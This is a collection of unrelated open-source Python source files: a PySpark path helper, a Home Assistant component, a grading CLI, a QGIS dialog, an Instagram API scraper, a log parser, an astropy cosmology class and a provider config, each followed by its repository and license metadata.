pyspark is not already in our path"""
try:
from pyspark import context
except ImportError:
# We need to add PySpark, try findspark if we can but it has an
# undeclared IPython dep.
try:
import findspark
findspark.init()
except ImportError:
add_pyspark_path()
def add_pyspark_path():
"""Add PySpark to the library path based on the value of SPARK_HOME."""
try:
spark_home = os.environ['SPARK_HOME']
sys.path.append(os.path.join(spark_home, 'python'))
py4j_src_zip = glob(os.path.join(spark_home, 'python',
'lib', 'py4j-*-src.zip'))
if len(py4j_src_zip) == 0:
raise ValueError('py4j source archive not found in %s'
% os.path.join(spark_home, 'python', 'lib'))
else:
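            # sort descending so the newest py4j source archive is picked first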
py4j_src_zip = sorted(py4j_src_zip)[::-1]
sys.path.append(py4j_src_zip[0])
except KeyError:
print("""SPARK_HOME was not set. please set it. e.g.
SPARK_HOME='/home/...' ./bin/pyspark [program]""")
exit(-1)
except ValueError as e:
print(str(e))
exit(-1)
def quiet_py4j():
logger = logging.getLogger('py4j')
logger.setLevel(logging.INFO)
| eyeem/spark-testing-base | python/sparktestingbase/utils.py | Python | apache-2.0 | 1,497 |
"""The Unify Circuit component."""
import logging
import voluptuous as vol
from homeassistant.const import CONF_NAME, CONF_URL
from homeassistant.helpers import config_validation as cv, discovery
_LOGGER = logging.getLogger(__name__)
DOMAIN = "circuit"
CONF_WEBHOOK = "webhook"
WEBHOOK_SCHEMA = vol.Schema(
{vol.Optional(CONF_NAME): cv.string, vol.Required(CONF_URL): cv.string}
)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{vol.Required(CONF_WEBHOOK): vol.All(cv.ensure_list, [WEBHOOK_SCHEMA])}
)
},
extra=vol.ALLOW_EXTRA,
)
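# Example configuration.yaml entry (illustrative values; the exact webhook URL
# comes from your Circuit incoming-webhook configuration):
#
# circuit:
#   webhook:
#     - name: circuit_notifier
#       url: "https://yourcircuit.example.com/rest/webhooks/incoming/<token>"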
async def async_setup(hass, config):
"""Set up the Unify Circuit component."""
webhooks = config[DOMAIN][CONF_WEBHOOK]
for webhook_conf in webhooks:
hass.async_create_task(
discovery.async_load_platform(hass, "notify", DOMAIN, webhook_conf, config)
)
return True
| tchellomello/home-assistant | homeassistant/components/circuit/__init__.py | Python | apache-2.0 | 895 |
#!/usr/bin/env python3
#
# Copyright (C) 2012 W. Trevor King <wking@tremily.us>
#
# This file is part of pygrader.
#
# pygrader is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# pygrader is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# pygrader. If not, see <http://www.gnu.org/licenses/>.
"""Manage grades from the command line
"""
import configparser as _configparser
from email.mime.text import MIMEText as _MIMEText
import email.utils as _email_utils
import inspect as _inspect
import logging as _logging
import logging.handlers as _logging_handlers
import os.path as _os_path
import sys as _sys
import pgp_mime as _pgp_mime
import pygrader as _pygrader
from pygrader import __version__
from pygrader import LOG as _LOG
from pygrader import color as _color
from pygrader.email import test_smtp as _test_smtp
from pygrader.email import Responder as _Responder
from pygrader.mailpipe import mailpipe as _mailpipe
from pygrader.storage import initialize as _initialize
from pygrader.storage import load_course as _load_course
from pygrader.tabulate import tabulate as _tabulate
from pygrader.template import assignment_email as _assignment_email
from pygrader.template import course_email as _course_email
from pygrader.template import student_email as _student_email
from pygrader.todo import print_todo as _todo
if __name__ == '__main__':
from argparse import ArgumentParser as _ArgumentParser
parser = _ArgumentParser(description=__doc__)
parser.add_argument(
'-v', '--version', action='version',
version='%(prog)s {}'.format(_pgp_mime.__version__))
parser.add_argument(
'-d', '--base-dir', dest='basedir', default='.',
help='Base directory containing grade data')
parser.add_argument(
'-e', '--encoding', dest='encoding', default='utf-8',
help=('Override the default file encoding selection '
'(useful when running from procmail)'))
parser.add_argument(
'-c', '--color', default=False, action='store_const', const=True,
help='Color printed output with ANSI escape sequences')
parser.add_argument(
'-V', '--verbose', default=0, action='count',
help='Increase verbosity')
parser.add_argument(
'-s', '--syslog', default=False, action='store_const', const=True,
help='Log to syslog (rather than stderr)')
subparsers = parser.add_subparsers(title='commands')
smtp_parser = subparsers.add_parser(
'smtp', help=_test_smtp.__doc__.splitlines()[0])
smtp_parser.set_defaults(func=_test_smtp)
smtp_parser.add_argument(
'-a', '--author',
help='Your address (email author)')
smtp_parser.add_argument(
'-t', '--target', dest='targets', action='append',
help='Address for the email recipient')
initialize_parser = subparsers.add_parser(
'initialize', help=_initialize.__doc__.splitlines()[0])
initialize_parser.set_defaults(func=_initialize)
initialize_parser.add_argument(
'-D', '--dry-run', default=False, action='store_const', const=True,
help="Don't actually send emails, create files, etc.")
tabulate_parser = subparsers.add_parser(
'tabulate', help=_tabulate.__doc__.splitlines()[0])
tabulate_parser.set_defaults(func=_tabulate)
tabulate_parser.add_argument(
'-s', '--statistics', default=False, action='store_const', const=True,
help='Calculate mean and standard deviation for each assignment')
email_parser = subparsers.add_parser(
'email', help='Send emails containing grade information')
email_parser.add_argument(
'-D', '--dry-run', default=False, action='store_const', const=True,
help="Don't actually send emails, create files, etc.")
email_parser.add_argument(
'-a', '--author',
help='Your name (email author), defaults to course robot')
email_parser.add_argument(
'--cc', action='append', help='People to carbon copy')
email_subparsers = email_parser.add_subparsers(title='type')
assignment_parser = email_subparsers.add_parser(
'assignment', help=_assignment_email.__doc__.splitlines()[0])
assignment_parser.set_defaults(func=_assignment_email)
assignment_parser.add_argument(
'assignment', help='Name of the target assignment')
student_parser = email_subparsers.add_parser(
'student', help=_student_email.__doc__.splitlines()[0])
student_parser.set_defaults(func=_student_email)
student_parser.add_argument(
'-o', '--old', default=False, action='store_const', const=True,
help='Include already-notified information in emails')
student_parser.add_argument(
'-s', '--student', dest='student',
help='Explicitly select the student to notify (instead of everyone)')
course_parser = email_subparsers.add_parser(
'course', help=_course_email.__doc__.splitlines()[0])
course_parser.set_defaults(func=_course_email)
course_parser.add_argument(
'-t', '--target', dest='targets', action='append',
help='Name, alias, or group for the email recipient(s)')
mailpipe_parser = subparsers.add_parser(
'mailpipe', help=_mailpipe.__doc__.splitlines()[0])
mailpipe_parser.set_defaults(func=_mailpipe)
mailpipe_parser.add_argument(
'-D', '--dry-run', default=False, action='store_const', const=True,
help="Don't actually send emails, create files, etc.")
mailpipe_parser.add_argument(
'-m', '--mailbox', choices=['maildir', 'mbox'],
help=('Instead of piping a message in via stdout, you can also read '
'directly from a mailbox. This option specifies the format of '
'your target mailbox.'))
mailpipe_parser.add_argument(
'-i', '--input', dest='input_', metavar='INPUT',
help='Path to the mailbox containing messages to be processed')
mailpipe_parser.add_argument(
'-o', '--output',
        help=('Path to the mailbox that will receive successfully processed '
'messages. If not given, successfully processed messages will '
'be left in the input mailbox'))
mailpipe_parser.add_argument(
'-l', '--max-late', default=0, type=float,
help=('Grace period in seconds before an incoming assignment is '
'actually marked as late'))
mailpipe_parser.add_argument(
'-r', '--respond', default=False, action='store_const', const=True,
help=('Send automatic response emails to acknowledge incoming '
'messages.'))
mailpipe_parser.add_argument(
'-t', '--trust-email-infrastructure',
default=False, action='store_const', const=True,
help=('Send automatic response emails even if the target has not '
'registered a PGP key.'))
mailpipe_parser.add_argument(
'-c', '--continue-after-invalid-message',
default=False, action='store_const', const=True,
help=('Send responses to invalid messages and continue processing '
'further emails (default is to die with an error message).'))
todo_parser = subparsers.add_parser(
'todo', help=_todo.__doc__.splitlines()[0])
todo_parser.set_defaults(func=_todo)
todo_parser.add_argument(
'source', help='Name of source file/directory')
todo_parser.add_argument(
'target', help='Name of target file/directory')
# p.add_option('-t', '--template', default=None)
args = parser.parse_args()
if not hasattr(args, 'func'):
# no command selected; print help and die
parser.print_help()
_sys.exit(0)
if args.verbose:
_LOG.setLevel(max(_logging.DEBUG, _LOG.level - 10*args.verbose))
_pgp_mime.LOG.setLevel(_LOG.level)
if args.syslog:
syslog = _logging_handlers.SysLogHandler(address="/dev/log")
syslog.setFormatter(_logging.Formatter('%(name)s: %(message)s'))
for handler in list(_LOG.handlers):
_LOG.removeHandler(handler)
_LOG.addHandler(syslog)
for handler in list(_pgp_mime.LOG.handlers):
_pgp_mime.LOG.removeHandler(handler)
_pgp_mime.LOG.addHandler(syslog)
_color.USE_COLOR = args.color
_pygrader.ENCODING = args.encoding
config = _configparser.ConfigParser()
config.read([
_os_path.expanduser(_os_path.join('~', '.config', 'smtplib.conf')),
], encoding=_pygrader.ENCODING)
func_args = _inspect.getargspec(args.func).args
kwargs = {}
if 'basedir' in func_args:
kwargs['basedir'] = args.basedir
if 'course' in func_args:
course = _load_course(basedir=args.basedir)
active_groups = course.active_groups()
kwargs['course'] = course
if hasattr(args, 'assignment'):
kwargs['assignment'] = course.assignment(name=args.assignment)
if hasattr(args, 'cc') and args.cc:
kwargs['cc'] = [course.person(name=cc) for cc in args.cc]
for attr in ['author', 'student']:
if hasattr(args, attr):
name = getattr(args, attr)
if name is None and attr == 'author':
kwargs[attr] = course.robot
else:
kwargs[attr] = course.person(name=name)
for attr in ['targets']:
if hasattr(args, attr):
people = getattr(args, attr)
if people is None:
people = ['professors'] # for the course email
kwargs[attr] = []
for person in people:
if person in active_groups:
kwargs[attr].extend(course.find_people(group=person))
else:
kwargs[attr].extend(course.find_people(name=person))
for attr in ['dry_run', 'mailbox', 'output', 'input_', 'max_late',
'old', 'statistics', 'trust_email_infrastructure',
'continue_after_invalid_message']:
if hasattr(args, attr):
kwargs[attr] = getattr(args, attr)
elif args.func == _test_smtp:
for attr in ['author', 'targets']:
if hasattr(args, attr):
kwargs[attr] = getattr(args, attr)
elif args.func == _todo:
for attr in ['source', 'target']:
if hasattr(args, attr):
kwargs[attr] = getattr(args, attr)
if 'use_color' in func_args:
kwargs['use_color'] = args.color
if ('smtp' in func_args and
not kwargs.get('dry_run', False) and
'smtp' in config.sections()):
params = _pgp_mime.get_smtp_params(config)
kwargs['smtp'] = _pgp_mime.get_smtp(*params)
del params
if hasattr(args, 'respond') and getattr(args, 'respond'):
kwargs['respond'] = _Responder(
smtp=kwargs.get('smtp', None),
dry_run=kwargs.get('dry_run', False))
_LOG.debug('execute {} with {}'.format(args.func, kwargs))
try:
ret = args.func(**kwargs)
finally:
smtp = kwargs.get('smtp', None)
if smtp:
_LOG.info('disconnect from SMTP server')
smtp.quit()
if ret is None:
ret = 0
_sys.exit(ret)
| wking/pygrader | bin/pg.py | Python | gpl-3.0 | 11,702 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
EditRScriptDialog.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from sextante.gui.ParametersDialog import ParametersDialog
from sextante.core.QGisLayers import QGisLayers
from sextante.modeler.Providers import Providers
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import sys
from PyQt4 import QtCore, QtGui
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from sextante.gui.HelpEditionDialog import HelpEditionDialog
import pickle
from sextante.r.RAlgorithm import RAlgorithm
from sextante.r.RUtils import RUtils
class EditRScriptDialog(QtGui.QDialog):
def __init__(self, alg):
self.alg = alg
if self.alg is not None:
self.filename = self.alg.descriptionFile
else:
self.filename = None
QtGui.QDialog.__init__(self)
self.setModal(False)
self.setupUi()
self.update = False
self.help = None
def setupUi(self):
self.resize(600,400)
self.setWindowTitle("Edit script")
layout = QVBoxLayout()
self.text = QtGui.QTextEdit()
self.text.setObjectName("text")
self.text.setEnabled(True)
self.buttonBox = QtGui.QDialogButtonBox()
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
if self.alg != None:
self.text.setText(self.alg.script)
self.editHelpButton = QtGui.QPushButton()
self.editHelpButton.setText("Edit script help")
self.buttonBox.addButton(self.editHelpButton, QtGui.QDialogButtonBox.ActionRole)
QObject.connect(self.editHelpButton, QtCore.SIGNAL("clicked()"), self.editHelp)
self.saveButton = QtGui.QPushButton()
self.saveButton.setText("Save")
self.buttonBox.addButton(self.saveButton, QtGui.QDialogButtonBox.ActionRole)
self.runButton = QtGui.QPushButton()
self.runButton.setText("Run")
self.buttonBox.addButton(self.runButton, QtGui.QDialogButtonBox.ActionRole)
self.closeButton = QtGui.QPushButton()
self.closeButton.setText("Close")
self.buttonBox.addButton(self.closeButton, QtGui.QDialogButtonBox.ActionRole)
QObject.connect(self.runButton, QtCore.SIGNAL("clicked()"), self.runAlgorithm)
QObject.connect(self.saveButton, QtCore.SIGNAL("clicked()"), self.saveAlgorithm)
QObject.connect(self.closeButton, QtCore.SIGNAL("clicked()"), self.cancelPressed)
layout.addWidget(self.text)
layout.addWidget(self.buttonBox)
self.setLayout(layout)
QtCore.QMetaObject.connectSlotsByName(self)
def editHelp(self):
if self.alg is None:
alg = RAlgorithm(None, unicode(self.text.toPlainText()))
else:
alg = self.alg
dlg = HelpEditionDialog(alg)
dlg.exec_()
        # We store the description strings in case they could not be saved
        # because no filename was defined yet
if self.alg is None and dlg.descriptions:
self.help = dlg.descriptions
def runAlgorithm(self):
alg = RAlgorithm(None, unicode(self.text.toPlainText()))
alg.provider = Providers.providers['r']
dlg = alg.getCustomParametersDialog()
if not dlg:
dlg = ParametersDialog(alg)
canvas = QGisLayers.iface.mapCanvas()
prevMapTool = canvas.mapTool()
dlg.show()
dlg.exec_()
if canvas.mapTool()!=prevMapTool:
try:
canvas.mapTool().reset()
except:
pass
canvas.setMapTool(prevMapTool)
def saveAlgorithm(self):
if self.filename is None:
self.filename = str(QtGui.QFileDialog.getSaveFileName(self, "Save Script", RUtils.RScriptsFolder(), "SEXTANTE R script (*.rsx)"))
if self.filename:
if not self.filename.endswith(".rsx"):
self.filename += ".rsx"
text = str(self.text.toPlainText())
if self.alg is not None:
self.alg.script = text
try:
fout = open(self.filename, "w")
fout.write(text)
fout.close()
except IOError:
QMessageBox.warning(self,
self.tr("I/O error"),
self.tr("Unable to save edits. Reason:\n %1").arg(unicode(sys.exc_info()[1]))
)
return
self.update = True
            # if help strings were defined before the script was first saved, we save them here
if self.help:
f = open(self.filename + ".help", "wb")
pickle.dump(self.help, f)
f.close()
self.help = None
QtGui.QMessageBox.information(self, "Script saving", "Script was correctly saved.")
else:
self.filename = None
def cancelPressed(self):
#self.update = False
self.close()
| slarosa/QGIS | python/plugins/sextante/r/EditRScriptDialog.py | Python | gpl-2.0 | 5,932 |
#!/usr/bin/env python
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
#
# Copyright 2015 Michael Pitidis
"""
Retrieve posts, comments and likes through the Instagram API.
"""
import requests
import sys, os, json, collections, argparse
from datetime import datetime
API_URL = 'https://api.instagram.com/v1'
def main(args):
opts = parse_cli(args[1:], default_endpoints().keys(), API_URL)
return process(opts, default_endpoints(), default_parameters())
def default_endpoints():
return dict(
tags = paginate_tags
, comments = no_pagination
, likes = no_pagination
)
def default_parameters():
return dict(
tags = dict(count = 50, min_tag_id = tag_window(int(datetime.now().strftime("%s")) - 24 * 3600 * 3))
, comments = dict(count = 200) # in practice no more than 150 will be returned
, likes = dict(count = 200) # in practice no more than 120 will be returned
)
def process(opts, endpoints, parameters):
if not os.path.isdir(opts.destination):
os.makedirs(opts.destination)
objects = one_of(opts.objects, opts.objects_file)
tokens = one_of(opts.tokens, opts.tokens_file)
params = parameters[opts.endpoint]
paginator = endpoints[opts.endpoint]
if opts.query_parameters:
params.update(opts.query_parameters)
params['count'] = opts.limit
ramp_up = geometric_ramp_up(opts.limit_factor, opts.limit_max)
progress = write_flush if opts.verbose else lambda x: x
serialize = choose_serializer(opts.type)
fmt = dict(endpoint=opts.endpoint, type=opts.type.replace('_pretty', ''))
for obj in objects:
if opts.endpoint in ('comments', 'likes'):
url = '%s/media/%s/%s' % (opts.url.rstrip('/'), obj, opts.endpoint)
else:
url = '%s/%s/%s/media/recent' % (opts.url.rstrip('/'), opts.endpoint, obj)
count = 0
for i, entry in enumerate(paginator(url, params, tokens, ramp_up), 1):
fmt.update(dict(object=obj, i=i))
write_file(os.path.join(opts.destination, opts.format % fmt), serialize(entry), opts.overwrite)
count += len(entry['content'].get('data', []))
progress("\r%s %d" % (obj, count))
progress('\n')
return 0
def choose_serializer(t):
if t == 'yaml':
try:
import yaml
return lambda x: yaml.safe_dump(x, default_flow_style=False, encoding='utf8', allow_unicode=True, width=1024**3)
except ImportError:
sys.stderr.write("python-yaml not available, using json format\n")
if t == 'json_pretty':
return lambda x: json.dumps(x, indent=2)
return json.dumps
def paginate_tags(endpoint, parameters, tokens, ramp_up = lambda x: x):
    return paginate(endpoint, parameters, tokens, extract_tags, ramp_up)
def no_pagination(endpoint, parameters, tokens, ramp_up = None):
# no cursor information to extract
return paginate(endpoint, parameters, tokens, cursor_extractor = lambda x: x)
def paginate(endpoint, parameters, tokens, cursor_extractor, ramp_up = lambda x: x):
"""Paginate through a graph endpoint using cursors."""
params = dict(parameters)
queue = collections.deque(tokens)
while True:
params['access_token'] = queue.popleft()
response = requests.get(endpoint, params=params)
content = parse_response(response)
yield dict(content=content, status=response.status_code, endpoint=endpoint, parameters=params)
cursors = cursor_extractor(content)
data = content.get('data', [])
if data and valid_tag_cursors(cursors, params):
queue.append(params['access_token'])
params.update(cursors)
if 'count' in params:
params['count'] = ramp_up(params['count'])
else:
break
def tag_window(timestamp):
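    # Instagram ids embed milliseconds since the service epoch in their top 41
    # bits; shifting by 64 - 41 = 23 turns a unix timestamp (in seconds) into a
    # lower-bound tag id.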
epoch = 1314220021721
base = timestamp * 1000 - epoch
return base << (64 - 41)
def post_date(post_id):
epoch = 1314220021721
base = long(post_id.split('_')[0]) >> (64 - 41)
return (base + epoch) / 1000
def valid_tag_cursors(cursors, params):
key = 'max_tag_id'
return key in cursors and cursors.get(key) != params.get(key)
def extract_tags(c):
pagination = c.get('pagination', {})
cursors = dict()
max_id = pagination.get('next_max_tag_id')
if max_id is None and c.get('data', []):
max_id = min(int(e['id'].split('_')[0]) for e in c.get('data', []))
#min_id = pagination.get('min_tag_id') # How about keeping the existing one?
if max_id is not None:
cursors['max_tag_id'] = max_id
#if min_id is not None:
# cursors['min_tag_id'] = min_id
return cursors
def extract_query(s):
parts = s.split('?', 1)
if len(parts) == 2:
return dict(p.split('=', 1) for p in parts[1].split('&'))
return dict()
def one_of(*lists):
return tuple(e.strip() for l in lists if l is not None for e in l)
def write_flush(s):
sys.stderr.write(s)
sys.stderr.flush()
def write_file(filename, data, overwrite=False):
assert overwrite or not os.path.exists(filename) # XXX: race condition
with open(filename, 'wt') as fd:
fd.write(data)
def geometric_ramp_up(multiplier, ceiling):
return lambda x: min(ceiling, x * multiplier)
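# e.g. geometric_ramp_up(2, 200) maps successive request counts 33 -> 66 -> 132 -> 200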
def parse_response(r):
try:
return r.json()
except:
return dict(error=r.text)
def parse_cli(args, endpoints, graph_url):
parser = argparse.ArgumentParser(
description='Paginate through the Facebook Graph API',
epilog='')
out = parser.add_argument_group('output').add_argument
out('-d', '--destination', default='.', metavar='DIRECTORY',
help='set output directory [%(default)s]')
out('--type', choices=('json', 'json_pretty', 'yaml'), default='json',
help='set output file type [%(default)s]')
out('--format', default='%(endpoint)s-%(object)s-%(i)04d.%(type)s',
help='set output file format [%(default)s]')
out('--overwrite', action='store_true',
help='overwrite output files')
out('-v', '--verbose', action='store_true',
help='print progress information on standard error')
req = parser.add_argument_group('requests').add_argument
req('-u', '--url', default=graph_url,
help='set API base url [%(default)s]')
req('-q', '--query-parameters', nargs=2, action='append', metavar=('KEY', 'VALUE'),
help='specify additional query parameters, e.g. -q fields id,message')
limits = parser.add_argument_group('limits').add_argument
limits('-l', '--limit', type=int, default=33,
help='set the initial request limit [%(default)s]')
limits('--limit-max', type=int, default=200,
help='set the maximum request limit [%(default)s]')
limits('--limit-factor', type=int, default=2,
help='set limit multiplication factor [%(default)s]')
tokens = parser.add_argument_group('tokens').add_argument
t1 = tokens('-t', '--tokens', nargs='+', metavar='TOKEN',
help='provide a pool of access tokens for performing requests')
t2 = tokens('--tokens-file', type=argparse.FileType('rt'), metavar='FILENAME',
help='read access tokens from a file one per line')
objects = parser.add_argument_group('targets').add_argument
objects('-e', '--endpoint', choices=endpoints, required=True,
help='choose request endpoint')
o1 = objects('objects', metavar='ID', nargs='*',
help='Instagram IDs to retrieve data for')
o2 = objects('--objects-file', type=argparse.FileType('rt'), metavar='FILENAME',
help='read object IDs from a file one per line')
opts = parser.parse_args(args)
if not (opts.objects or opts.objects_file):
parser.error("at least one %s or %s is required" % (o1.metavar, '/'.join(o2.option_strings)))
if not (opts.tokens or opts.tokens_file):
parser.error("at least one of %s or %s is required" % ('/'.join(t1.option_strings), '/'.join(t2.option_strings)))
return opts
if __name__ == '__main__':
sys.exit(main(sys.argv))
| mpitid/apiutils | instagram/instapi.py | Python | lgpl-2.1 | 8,762 |
#!/usr/bin/env python3
# Copyright 2019 Canonical Ltd.
# Licensed under the AGPLv3, see LICENCE file for details.
import argparse
import re
import sys
def main(args):
p = argparse.ArgumentParser(description="parse claim log files, reporting output")
p.add_argument("file", type=argparse.FileType('r'), default=sys.stdin, nargs="?",
help="the name of the file to parse")
p.add_argument("--tick", type=float, default=1.0,
help="seconds between printing status ticks")
opts = p.parse_args(args)
    actionsRE = re.compile(r"\s*(?P<time>\d+\.\d\d\d)s\s+(?P<action>claimed|extended|lost|connected).*in (?P<duration>[0-9m.]+s)")
    # We don't have minutes if we have 'ms', so match 'ms' first; we might have 'm' if we have 's', so put it before 's'.
    durationRE = re.compile(r"((?P<milliseconds>\d+)ms)?((?P<minutes>\d+)m)?((?P<seconds>\d+(\.\d+)?)s)?")
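    # e.g. "1m2.5s" -> minutes="1", seconds="2.5"; "750ms" -> milliseconds="750"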
totalClaims = 0
extendedSum = 0
extendedCount = 0
lostCount = 0
lastTime = 0
claimSum = 0
claimCount = 0
print("claims\tclaim time\textend time\tlost")
for line in opts.file:
m = actionsRE.match(line.strip())
if m is None:
continue
curTime, action, duration = m.group('time', 'action', 'duration')
curTime = float(curTime)
m2 = durationRE.match(duration)
if m2 is None:
print("could not match %q" % (duration,))
continue
m, s, ms = m2.group("minutes", "seconds", "milliseconds")
delta = 0
if m is not None:
delta += float(m)*60
if s is not None:
delta += float(s)
if ms is not None:
delta += float(ms) * 0.001
delta = round(delta, 3)
# print(action, duration, delta)
if action == "extended":
extendedCount += 1
extendedSum += delta
elif action == "lost":
totalClaims -= 1
lostCount += 1
elif action == "claimed":
totalClaims += 1
claimCount += 1
claimSum += delta
if curTime - lastTime > opts.tick:
lastTime = curTime
claimMsg = ""
if claimCount > 0:
claimAvg = claimSum / claimCount
claimCount = 0
claimSum = 0
claimMsg = "%9.3f" % (claimAvg,)
extendedMsg = " "*9
if extendedCount > 0:
extendedAvg = extendedSum / extendedCount
extendedSum = 0
extendedCount = 0
extendedMsg = "%9.3f" %(extendedAvg,)
print("%5d\t%9s\t%9s\t%d" % (totalClaims, claimMsg, extendedMsg, lostCount))
if __name__ == "__main__":
main(sys.argv[1:])
| freyes/juju | scripts/leadershipclaimer/count-leadership.py | Python | agpl-3.0 | 2,748 |
from astropy.cosmology import FLRW
from astropy import units as u
from astropy.utils.misc import isiterable
import numpy as np
def _float_or_none(x, fmt=".3g"):
    """Helper for ``__repr__``: format a number with ``fmt``, or return 'None'."""
    if x is None:
        return str(x)
    return ("{0:" + fmt + "}").format(x)
class n7CPL(FLRW):
"""FLRW cosmology with a n=7 nCPL dark energy equation of state and curvature.
The equation for the dark energy equation of state uses the
nCPL form as described in Pantazis et al. (2016):
:math:`w(z) = w_0 + w_a (1-a)^n = w_0 + w_a z^n / (1+z)^n`.
Parameters
----------
H0 : float or `~astropy.units.Quantity`
Hubble constant at z = 0. If a float, must be in [km/sec/Mpc]
Om0 : float
Omega matter: density of non-relativistic matter in units of the
critical density at z=0.
Ode0 : float
Omega dark energy: density of dark energy in units of the critical
density at z=0.
w0 : float, optional
Dark energy equation of state at z=0 (a=1). This is pressure/density
for dark energy in units where c=1.
wa : float, optional
        Amplitude of the :math:`(1-a)^n` term in the dark energy equation of
        state. A cosmological constant has w0=-1.0 and wa=0.0.
Tcmb0 : float or scalar `~astropy.units.Quantity`, optional
Temperature of the CMB z=0. If a float, must be in [K].
Default: 2.725 [K]. Setting this to zero will turn off both photons
and neutrinos (even massive ones).
Neff : float, optional
Effective number of Neutrino species. Default 3.04.
m_nu : `~astropy.units.Quantity`, optional
Mass of each neutrino species. If this is a scalar Quantity, then all
neutrino species are assumed to have that mass. Otherwise, the mass of
each species. The actual number of neutrino species (and hence the
number of elements of m_nu if it is not scalar) must be the floor of
Neff. Typically this means you should provide three neutrino masses
unless you are considering something like a sterile neutrino.
Ob0 : float or None, optional
Omega baryons: density of baryonic matter in units of the critical
density at z=0. If this is set to None (the default), any
computation that requires its value will raise an exception.
name : str, optional
Name for this cosmological object.
Examples
--------
    >>> from n7CPL import n7CPL
>>> cosmo = n7CPL(H0=70, Om0=0.3, Ode0=0.7, w0=-0.9, wa=0.2)
The comoving distance in Mpc at redshift z:
>>> z = 0.5
>>> dc = cosmo.comoving_distance(z)
"""
def __init__(self, H0, Om0, Ode0, w0=-1., wa=0., Tcmb0=2.725,
Neff=3.04, m_nu=u.Quantity(0.0, u.eV), Ob0=None, name=None):
FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name,
Ob0=Ob0)
self._w0 = float(w0)
self._wa = float(wa)
# Please see "Notes about speeding up integrals" for discussion
# about what is being done here.
'''
if self._Tcmb0.value == 0:
self._inv_efunc_scalar = scalar_inv_efuncs.w0wacdm_inv_efunc_norel
self._inv_efunc_scalar_args = (self._Om0, self._Ode0, self._Ok0,
self._w0, self._wa)
elif not self._massivenu:
self._inv_efunc_scalar = scalar_inv_efuncs.w0wacdm_inv_efunc_nomnu
self._inv_efunc_scalar_args = (self._Om0, self._Ode0, self._Ok0,
self._Ogamma0 + self._Onu0,
self._w0, self._wa)
else:
self._inv_efunc_scalar = scalar_inv_efuncs.w0wacdm_inv_efunc
self._inv_efunc_scalar_args = (self._Om0, self._Ode0, self._Ok0,
self._Ogamma0, self._neff_per_nu,
self._nmasslessnu,
self._nu_y_list, self._w0,
self._wa)
'''
@property
def w0(self):
""" Dark energy equation of state at z=0"""
return self._w0
@property
def wa(self):
""" Negative derivative of dark energy equation of state w.r.t. a"""
return self._wa
def w(self, z):
"""Returns dark energy equation of state at redshift ``z``.
Parameters
----------
z : array-like
Input redshifts.
Returns
-------
w : ndarray, or float if input scalar
The dark energy equation of state
Notes
------
The dark energy equation of state is defined as
:math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the
pressure at redshift z and :math:`\\rho(z)` is the density
at redshift z, both in units where c=1. Here this is
:math:`w(z) = w_0 + w_a (1 - a)^n = w_0 + w_a \\frac{z^n}{(1+z)^n}`.
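        For this class n = 7, so :math:`w(0) = w_0` and :math:`w(z)` tends to
        :math:`w_0 + w_a` as z grows large.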
"""
if isiterable(z):
z = np.asarray(z)
return self._w0 + self._wa * z**7 / ( (1.0 + z)**7)
def de_density_scale(self, z):
""" Evaluates the redshift dependence of the dark energy density.
Parameters
----------
z : array-like
Input redshifts.
Returns
-------
I : ndarray, or float if input scalar
The scaling of the energy density of dark energy with redshift.
Notes
-----
The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`,
        and in this case (n = 7, writing :math:`a = 1/(1+z)`) is given by
        .. math::
          I = \\left(1 + z\\right)^{3 \\left(1 + w_0 + w_a\\right)}
              \\exp\\left(-\\frac{w_a (1 - a)}{140} \\left(60 a^6 - 430 a^5
              + 1334 a^4 - 2341 a^3 + 2559 a^2 - 1851 a + 1089\\right)\\right)
"""
if isiterable(z):
z = np.asarray(z)
zp1 = 1.0 + z
aa = 1. / zp1
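        # closed form of exp(3 * integral_0^z [1 + w(z')] / (1 + z') dz') for n = 7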
return zp1 ** (3 * (1 + self._w0 + self._wa)) * \
np.exp(-self._wa * (1 - aa) * (60*aa**6 - 430*aa**5 + 1334*aa**4 - 2341*aa**3 + 2559*aa**2 - 1851*aa + 1089) / 140.)
def __repr__(self):
retstr = "{0}H0={1:.3g}, Om0={2:.3g}, "\
"Ode0={3:.3g}, w0={4:.3g}, wa={5:.3g}, Tcmb0={6:.4g}, "\
"Neff={7:.3g}, m_nu={8}, Ob0={9:s})"
return retstr.format(self._namelead(), self._H0, self._Om0,
self._Ode0, self._w0, self._wa,
self._Tcmb0, self._Neff, self.m_nu,
_float_or_none(self._Ob0)) | per-andersen/Deltamu | n7CPL.py | Python | gpl-3.0 | 6,396 |
from share.provider import OAIProviderAppConfig
class AppConfig(OAIProviderAppConfig):
name = 'providers.pe.upc'
version = '0.0.1'
title = 'Universidad Peruana de Ciencias Aplicadas (UPC)'
long_title = 'Universidad Peruana de Ciencias Aplicadas (UPC)'
home_page = 'http://repositorioacademico.upc.edu.pe'
